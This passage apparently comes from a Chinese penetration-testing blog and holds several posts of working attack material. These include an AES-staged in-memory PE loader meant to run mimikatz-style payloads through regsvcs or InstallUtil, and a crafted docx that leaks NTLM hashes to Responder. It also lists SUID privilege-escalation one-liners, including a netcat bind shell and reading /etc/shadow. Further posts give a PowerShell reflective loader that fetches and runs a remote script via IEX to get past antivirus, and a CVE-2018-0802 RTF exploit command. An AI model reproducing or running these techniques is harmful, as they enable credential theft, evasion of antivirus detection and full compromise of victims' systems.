            public IMAGE_OPTIONAL_HEADER32 OptionalHeader32
            {
                get
                {
                    return optionalHeader32;
                }
            }
    
    
            /// Gets the optional header
    
            public IMAGE_OPTIONAL_HEADER64 OptionalHeader64
            {
                get
                {
                    return optionalHeader64;
                }
            }
    
            public IMAGE_SECTION_HEADER[] ImageSectionHeaders
            {
                get
                {
                    return imageSectionHeaders;
                }
            }
    
            public byte[] RawBytes
            {
                get
                {
                    return rawbytes;
                }
    
            }
    
        }//End Class
    
    
        unsafe class NativeDeclarations
        {
    
            public static uint MEM_COMMIT = 0x1000;
            public static uint MEM_RESERVE = 0x2000;
            public static uint PAGE_EXECUTE_READWRITE = 0x40;
            public static uint PAGE_READWRITE = 0x04;
    
            [StructLayout(LayoutKind.Sequential)]
            public unsafe struct IMAGE_BASE_RELOCATION
            {
                public uint VirtualAdress;
                public uint SizeOfBlock;
            }
    
            [DllImport("kernel32")]
            public static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect);
    
            [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
            public static extern IntPtr LoadLibrary(string lpFileName);
    
            [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
            public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    
            [DllImport("kernel32")]
            public static extern IntPtr CreateThread(
    
              IntPtr lpThreadAttributes,
              uint dwStackSize,
              IntPtr lpStartAddress,
              IntPtr param,
              uint dwCreationFlags,
              IntPtr lpThreadId
              );
    
            [DllImport("kernel32")]
            public static extern UInt32 WaitForSingleObject(
    
              IntPtr hHandle,
              UInt32 dwMilliseconds
              );
    
            [StructLayout(LayoutKind.Sequential)]
            public unsafe struct IMAGE_IMPORT_DESCRIPTOR
            {
                public uint OriginalFirstThunk;
                public uint TimeDateStamp;
                public uint ForwarderChain;
                public uint Name;
                public uint FirstThunk;
            }
    
    
        }
    
        public class Misc
        {
            //Change This!
            private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
    
            public static void Stage(string fileName, string Key, string outFile)
            {
    
                byte[] raw = FileToByteArray(fileName);
                byte[] file = Encrypt(raw, Key);
    
                FileStream fileStream = File.Create(outFile);
    
                fileStream.Write(file, 0, file.Length);//Write stream to temp file
    
                //Console.WriteLine("File Ready, Now Deliver Payload");
    
            }
    
            public static byte[] FileToByteArray(string _FileName)
            {
                byte[] _Buffer = null;
                System.IO.FileStream _FileStream = new System.IO.FileStream(_FileName, System.IO.FileMode.Open, System.IO.FileAccess.Read);
                System.IO.BinaryReader _BinaryReader = new System.IO.BinaryReader(_FileStream);
                long _TotalBytes = new System.IO.FileInfo(_FileName).Length;
                _Buffer = _BinaryReader.ReadBytes((Int32)_TotalBytes);
                _FileStream.Close();
                _FileStream.Dispose();
                _BinaryReader.Close();
                return _Buffer;
            }
    
            public static byte[] Encrypt(byte[] plain, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateEncryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(plain, 0, plain.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
            public static byte[] Decrypt(byte[] cipher, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(cipher, 0, cipher.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
    
            public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
            {
                byte[] buffer = new byte[16 * 1024];
                using (MemoryStream ms = new MemoryStream())
                {
                    int read;
                    while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        ms.Write(buffer, 0, read);
                    }
                    return ms.ToArray();
                }
            }
    
        }//End Misc Class
    
        public class Package
        {
            public static string filex86 = @"INSERT B64 HERE";
            public static string filex64 = @"INSERT B64 HERE";
    
        }
    }
    

    之后对cs进行编译,生成key.snk :

    $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
    $Content = [System.Convert]::FromBase64String($key)
    Set-Content key.snk -Value $Content -Encoding Byte
    

    编译exe:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
    

    编译以后可以直接运行,或者使用regsvcs.exe、regasm.exe、InstallUtil.exe来运行。

    1513688421587.png


    0 0

    之前有人总结了很多种窃取NTLM hash的方法,原文,译文。里面写的方法已经很多了,最近又学到了一个新的方法,所以在这里进行一下分享,也算是一个补充。

    历史上,Microsoft Word被用作HTML编辑器。这意味着它可以支持HTML元素,例如框架集。因此,可以将Microsoft Word文档与UNC路径链接起来,并将其与响应程序结合,以便从外部捕获NTLM哈希值。带有docx扩展名的Word文档实际上是一个包含各种XML文档的zip文件。这些XML文件正在控制主题,字体,文档的设置和Web设置。

    所以我们可以新建一个任意文档,并用压缩包来打开他。

    1513736341443.png

    word 目录下有一个webSettings.xml。我们对这个文件进行修改,添加以下代码则会创建与另外一个文件的链接。

    <w:frameset>
    <w:framesetSplitbar>
    <w:w w:val="60"/>
    <w:color w:val="auto"/>
    <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
    <w:frame>
    <w:name w:val="3"/>
    <w:sourceFileName r:id="rId1"/>
    <w:linkedToFile/>
    </w:frame>
    </w:frameset>
    </w:frameset>
    

    最终修改后的webSettings.xml如下:

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
        <w:frameset>
    <w:framesetSplitbar>
    <w:w w:val="60"/>
    <w:color w:val="auto"/>
    <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
    <w:frame>
    <w:name w:val="3"/>
    <w:sourceFileName r:id="rId1"/>
    <w:linkedToFile/>
    </w:frame>
    </w:frameset>
    </w:frameset>
    <w:optimizeForBrowser/><w:allowPNG/></w:webSettings>
    

    现在我们把新的webSettings.xml替换原来的webSettings.xml,之后在word目录下的_rels目录创建一个新的文件 webSettings.xml.rels,文件内容如下:

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships
    xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\172.16.103.130\Updates.docx" TargetMode="External"/>
    </Relationships>
    

    在这里包含了UNC路径。指向我们的Responder。

    之后把文档重新命名为docx。开启Responder

    python Responder.py -I eth0 -wrf
    

    打开word,则可获取到hash

    1513737175195.png

    当然,使用DDE的方式以及CVE-2017-0199等其他的方式都是可以的。


    0 0
  • 12/19/17--19:49: SUID Privilege Escalation (chan 69772723)
  • Linux提权中,可以用的SUID文件来提权,SUID的作用就是:让本来没有相应权限的用户运行这个程序时,可以访问没有权限访问的资源。通常可以使用一下命令来找有SUID标志位的文件:

    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} \;
    

    例如nmap

    ls -l /usr/bin/nmap
    -rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap
    

    存在s 则表示其存在SUID标志位,并拥有root的执行权限。以下是几类可用于提权的文件总结:

    1.Nmap

    老版本的nmap(2.02-5.21)有 interactive,是允许用户执行系统命令的。提权方式

    nmap --interactive
    

    之后执行命令:

    nmap> !sh
    sh-3.2# whoami
    root
    

    msf中的模块为:

    exploit/unix/local/setuid_nmap
    

    2.Find

    touch test
    find test -exec whoami \;
    

    如果服务器上装了nc,可以直接使用以下命令进行监听:

    find test -exec netcat -lvp 5555 -e /bin/sh \;
    

    之后进行连接:

    netcat 192.168.1.100 5555
    

    则可获取root shell

    3.vim/vi

    打开vim,按下ESC

    :set shell=/bin/sh
    :shell
    

    则可执行命令

    4.bash

    bash -p
    bash-3.2# id
    uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
    

    5.less

    less /etc/passwd
    !/bin/sh
    

    6.more

    more /home/pelle/myfile
    !/bin/bash
    

    7.cp

    使用cp覆盖 /etc/shadow

    8.mv

    使用mv 覆盖 /etc/shadow 或者/etc/sudoers

    9.awk

    awk 'BEGIN {system("/bin/bash")}'
    

    10.man

    man passwd
    !/bin/bash
    

    11.python/perl/ruby/lua/etc

    perl

    exec "/bin/bash";
    

    python

    import os
    os.system("/bin/bash")
    

    12.tcpdump

    echo $'id\ncat /etc/shadow' > /tmp/.test
    chmod +x /tmp/.test
    sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
    

    欢迎补充。


    0 0

    有时候,使用某些exp进行提权的时候,exp可能会被查杀,当然,有源码的话,我们可以在源码上进行修改进行免杀处理,但是今天介绍的是另外一只方法,即使用PEloader来加载exp。
    powershell的PEloader在这里,查看代码我们可以看到,这个脚本使用非常简单,具体代码如下:

    $PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe')
    Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
    

    获取exp的字节流,之后再在内存中加载exp,所以思路也很简单,我们只需要把需要的exp转换成字符串,写入脚本,就可以构造一个powershell脚本。

    这里整理了一个脚本方便转换:

    function Convert-BinaryToString {
       [CmdletBinding()] param (
          [string] $FilePath
       )
       try {
          $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
       }
       catch {
          throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
       }
       if ($ByteArray) {
          $Base64String = [System.Convert]::ToBase64String($ByteArray);
       }
       else {
          throw '$ByteArray is $null.';
       }
       $Base64String | set-content ("b64.txt")
    }
    

    使用zcgonvh的16032做演示。使用脚本转换:

    PS C:\Users\evi1cg\Desktop\16_032> . .\Convert-BinaryToString.ps1
    PS C:\Users\evi1cg\Desktop\16_032> Convert-BinaryToString -FilePath .\ms16-032_x64.exe
    

    生成base64的字符串并存储在b64.txt中。
    4B544212-75E6-4CAD-839C-18F77CA759EA.png

    使用如下命令进行转换:

    $InputString = "base64string"
    $PEBytes = [System.Convert]::FromBase64String($InputString)
    

    之后就可以使用

    Invoke-ReflectivePEInjection -PEBytes $PEBytes
    

    进行加载,最后分享一下最终的脚本:

    E2P_MS16-032.ps1

    使用方式为:

    E2P_MS16-032 -Command '"net user"'
    

    photo_2017-12-27_20-07-13.jpg

    脚本GITHUB:

    远程加载命令:

    powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/E2P_MS16-032.ps1');E2P_MS16-032 -Command '\"whoami\"'"
    

    717403C9-86AA-4594-A35F-9D0A1307088C.png


    0 0
  • 01/12/18--03:41: CVE-2018-0802利用 (chan 69772723)
  • 在CVE-2017-11882之后,2018年1月份又出了一个新的“噩梦公式二代”,在野样本嵌入了利用Nday漏洞和0day漏洞的2个公式对象同时进行攻击,Nday漏洞可以攻击未打补丁的系统,0day漏洞则攻击全补丁系统,绕过了CVE-2017-11882补丁的ASLR(地址随机化)安全保护措施,攻击最终将在用户电脑中植入恶意的远程控制程序。关于此漏洞的分析,可以看这里,今天看到在github公开了一个CVE-2018-0802的利用脚本,地址在这,为了达到最完美的利用,所以编写了RTF_11882_0802。

    GITHUB:
    此脚本集合了两个公式利用漏洞。

    利用方式与之前的方式一样。

    python RTF_11882_0802.py -c "cmd.exe /c calc.exe"  -i test.rtf -o test.doc
    

    其实就是简单粗暴的把两个公式编辑器插入文档中,一个是11882,一个是0802。

    “噩梦公式二代”(CVE-2018-0802)所使用的0day漏洞堪称CVE-2017-11882的双胞胎漏洞,攻击样本中的一个漏洞针对未打补丁前的系统,另外一个漏洞针对打补丁后的系统,利用两个OLE同时进行攻击,黑客精心构造的攻击完美兼容了系统漏洞补丁环境的不同情况。这个漏洞的利用技巧和Bypass ASLR的方式都带有一定的巧合性,假如EQNEDT32.EXE模块内没有一条满足条件的ret指令可以用来绕过ASLR,假如lpLogFont不是sub_21774的第一个参数,假如CVE-2017-11882的补丁修复方式强制开启了DEP保护,“噩梦公式二代”将没有可乘之机。

    解决方案

    一、及时更新补丁

    补丁下载地址:

    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802

    二、通过注册表禁用此模块,可通过修改注册表,禁用以下COM控件的方式进行缓解,其中XX.X为版本号

    在运行中输入:

    reg add “HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COMCompatibility\{0002CE02-0000- 0000-C000-000000000046}” /v”Compatibility Flags” /t REG_DWORD /d 0×400
    
    reg add”HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}” /v”Compatibility Flags” /t REG_DWORD /d 0×400
    

    注:此脚本只是为了安全研究,切勿非法使用!使用此脚本所造成的一切法律问题及后果,本站概不负责!